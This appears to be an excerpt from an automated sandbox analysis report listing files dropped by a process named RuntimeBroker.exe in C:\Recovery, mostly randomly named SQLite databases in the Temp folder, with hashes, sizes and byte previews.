                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\NPRdKOHmNL

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\OLar5KV8nN

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\OUF1m4kxkl

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Oj5oEzsW5D

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Or1CX5YQAJ

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\OtHSxTXITh

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\PPqOOwXkmo

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\PRAtLFkNON

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\PSrOWPS5Hg

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\PneITNrdo3

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Q9hA6MH1oK

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\QdotU8QqGI

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\QpQxKhzNJK

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\QqgTsVwY3G

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RAIjWuSd0z

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RESA9C5.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Nov 12 00:49:49 2024, 1st section name ".debug$S"
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1952
                                                                                                            Entropy (8bit):4.550525359687426
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:HBbW96XOmCQDfHEYwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:q2knKhmMluOulajfqXSfbNtmh5Z
                                                                                                            MD5:852EE90062650E41247A0C54253EE73D
                                                                                                            SHA1:55710DB6D416A2B618A555639D17D89593EB4D45
                                                                                                            SHA-256:82F28981AE99C67B068D57B55E11D85A754820B8180E296D69E3DF4E3860AD3A
                                                                                                            SHA-512:209E0773443DBFF77134EDD5F3E0BE9FB259AC463F4C01196A9887E5BD7C7C3F79EE0E367CEB36A91A1941D885CB3B312C559F32AA6B8DB3BA4F25A0FF87D647
                                                                                                            Malicious:false
                                                                                                            Preview:L...-.2g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESA9C5.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                                                            C:\Users\user\AppData\Local\Temp\RNHJFuCS2y

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RNfeXV4gEe

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RSM71EoiSW

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Rf8AEXEUiB

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RhyFNBHH5j

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RiS2zEzvhs

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
